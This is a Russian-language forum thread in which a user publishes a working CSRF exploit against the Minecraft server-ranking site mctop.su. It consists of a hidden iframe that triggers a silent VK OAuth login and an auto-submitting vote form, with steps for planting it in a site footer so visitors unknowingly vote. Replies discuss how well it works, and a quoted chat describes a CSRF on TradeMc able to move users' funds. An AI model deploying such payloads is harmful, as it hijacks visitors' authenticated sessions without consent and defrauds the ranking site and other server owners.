Утилита CSRF на McTop, или при заходе на ваш сайт игрок автоматически голосует за вас

Понаходил CSRF уязвимости на паре зарубежных и русских сайтов (mcdonate.ru / trademc.org / twitchalerts.com и др.), в том числе и на mctop.su
Всем этим сайтам написал, большинство прикрыли дырки и дали денежное вознаграждение, но mctop мне за 2 недели даже не ответили, по этому пишу сюда

Уязвимость позволяет вам установить на сайт вашего проекта небольшой скрипт, при заходе на ваш сайт, если человек хоть раз авторизовывался на mctop в прошлом (голосовал за какой-то другой сервер) - Его автоматически залогинит с вк на mctop и он автоматически проголосует за ваш сервер без своего ведома.

Как установить:
1) Создаем на сайте файл, например "mctop.php", с таким содержимым:

HTML:

<iframe scrolling="no" src="https://oauth.vk.com/authorize?client_id=4968544&redirect_uri=http://mctop.su/site/login_vk&response_type=code" width="0px" frameborder="0" height="0px"></iframe>
 
<form method="POST" action="http://mctop.su/vote/<ИД_ВАШЕГО_СЕРВЕРА>">
  <input type="hidden" name="nickname" value="<?php echo rand(0,9999999);?>">
  <input type="submit" id="doit">
</form>
<script>
  setTimeout(function(){document.getElementById("doit").click()}, 2000);
</script>

Где <ИД_ВАШЕГО_СЕРВЕРА> - это id вашего сервера на mctop (например 1088)



2) Добавляем например в конец главой страницы вашего сайта (в Footer) такой код:

HTML:

<iframe width="0" scrolling="no" height="0" frameborder="0" src="mctop.php" seamless="seamless"></iframe>

3) Profit. Петя зашел на ваш сайт -> Если он сегодня еще не голосовал за ваш сервер -> Он только что за него проголосовал.

 

Лука

 

Хм, а что если он зайдет на сайт ещё раз? Ещё один голос начислят?

 

Раз в 24 часа, тоже самое если бы он самостоятельно голосовал

 

Но ведь запросит авторизацию вк если не авторизован. Разве не так ?

 

Нет, если вк приложение mctop'а одобрено (Человек хотя-бы 1 раз авторизировался на mctop) - его залогинит автоматически.

 

с другими топами прокатит ?

 

СПАСИБ!

 

Ну вот, теперь куча школотронов поставят этот скрипт и накрутят себе голоса.

 

Ну сами же не захотели фиксить, мы что умолять их будем фиксить?

 

То чувство, когда начал уже ставить, а вспомнил что нету тебя на mctop

 

По крайней мере, активная XSS и CSRF, связанная по сменой личных данных, была починена почти сразу.

 

А если он ни разу не голосовал на mctop?

А если он голосовал сегодня, го за другой проект? Мне голос начислится или нет?!

 

Если ниразу не входил на mctop, то не проголосует.
Если уже голосовал сегодня за другой проект - голос за твой проект начислится.

И разговор с вами у меня сложился примерно вот такой:

Спойлер: Переписка

Дмитрий
Привет, я нашел очень серьезную уязвимость на TradeMc, если админ сервера кликнет по моей ссылке я могу поменять любую настройку в его личном кабинете, вывести на свой кошелек деньги с доната, добавить любые команды в магазин сервера, даже удалить проект.
Можете предоставить награду за нахождение уязвимости? Я предоставлю все данные о ней, даже помогу пофиксить.

Сашка
Что вы имеете ввиду?

Дмитрий
Если админ сервера перейдет по моей ссылке когда он авторизован на TradeMc, я могу без его ведома провести любое действие с его аккаунтом
Я могу замаскировать такую ссылку под какую нибудь картинку / пост в блоге / какой нибудь эмейл

Сашка
Каким образом?

Дмитрий
Если пользователь авторизован на TradeMc и у него есть 100р. на аккаунте, просто перейдя по этой ссылке (пример)starcrack.hol.es/babon/trademc.html он отправит деньги на любой указанный мною адрес
Можно сделать так что он даже не увидит этой переадресации на ваш сайт

Сашка
ну понятно

Дмитрий
Это действительно одна из самых опасных уязвимостей в вебе
И у вас от нее 0 защиты

Сашка
Хорошо. Спасибо за информацию

Дмитрий
»Можете предоставить награду за нахождение уязвимости? Я предоставлю все данные о ней, даже помогу пофиксить.

Сашка
Какую награду?

Дмитрий
Денежную. И я расскажу все подробности, что за уязвимость, как исправить.

Сашка
мы не даем никаких наград

 

По разговору с этим "меденжером" видно, что он либо даун, либо недопонимает о чем говорит. Хотя, да действительно, процент то они получили, а на бабло других им пофиг.

 

Не, я даже не отношусь к их команде. Я сам нашёл дырки(о CSRF только предполагал, что она возможна, потому что токенов и запросов текущих паролей не было тогда), немного раскрутил(а XSS там высвечивается даже в списке проектов, потому что была в названии сервера), и через минуту увидел вместо своего названия "fixed". По CSRF я отписал им в личку, и они ответили, что уже всё починили.